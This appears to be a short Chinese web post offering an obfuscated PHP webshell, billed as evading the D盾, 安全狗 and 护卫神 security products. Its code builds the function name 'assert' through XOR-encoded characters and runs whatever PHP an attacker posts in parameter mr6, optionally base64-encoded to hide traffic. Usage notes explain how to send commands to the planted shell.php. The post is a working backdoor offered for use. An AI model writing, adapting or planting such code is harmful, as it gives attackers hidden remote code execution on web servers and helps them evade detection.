免杀PHP一句话shell,利用随机异或免杀D盾,免杀安全狗护卫神等
<?php
class VONE {
function HALB() {
$rlf = \'B\' ^ "\x23";
$fzq = \'D\' ^ "\x37";
$fgu = \'h\' ^ "\x1b";
$sbe = \'R\' ^ "\x37";
$gba = \'H\' ^ "\x3a";
$oya = \'Y\' ^ "\x2d";
$MWUC = $rlf . $fzq . $fgu . $sbe . $gba . $oya;
return $MWUC;}function __destruct() {
$RNUJ = $this->HALB();
@$RNUJ($this->HY);}}
$vone = new VONE();
@$vone->HY = isset($_GET[\'id\']) ? base64_decode($_POST[\'mr6\']) : $_POST[\'mr6\'];
?>
使用说明
是否传入id参数决定是否把流量编码 http://www.xxx.com/shell.php POST: mr6=phpinfo(); //与普通shell相同 http://www.xxx.com/shell.php?id=xxx(xxxx随便修改) POST: mr6=cGhwaW5mbygpOwo= //payload的base64编码
请发表评论